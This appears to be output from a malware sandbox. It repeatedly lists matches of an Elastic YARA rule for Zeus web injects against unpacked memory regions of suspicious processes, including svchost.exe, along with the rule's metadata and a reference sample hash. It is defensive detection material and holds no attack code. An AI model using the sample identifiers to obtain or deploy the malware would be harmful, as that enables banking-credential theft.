Source: 0.2.Bpfz752pYZ.exe.407000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.48.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.NcYLgtXIKJgHj.exe.16e2000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.66.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.59.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.58.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 28.2.NcYLgtXIKJgHj.exe.2d12000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.NcYLgtXIKJgHj.exe.16e2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.37.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 20.2.NcYLgtXIKJgHj.exe.27d0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bpfz752pYZ.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.33.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.30.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.33.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.65.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.65.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 31.2.NcYLgtXIKJgHj.exe.2792000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.57.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.55.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.NcYLgtXIKJgHj.exe.23a0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.44.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.Bpfz752pYZ.exe.406400.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.42.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.59.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2cd1c00.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.2.svchost.exe.2c70000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.NcYLgtXIKJgHj.exe.2340000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.38.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.72.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 36.2.NcYLgtXIKJgHj.exe.23a0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.53.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
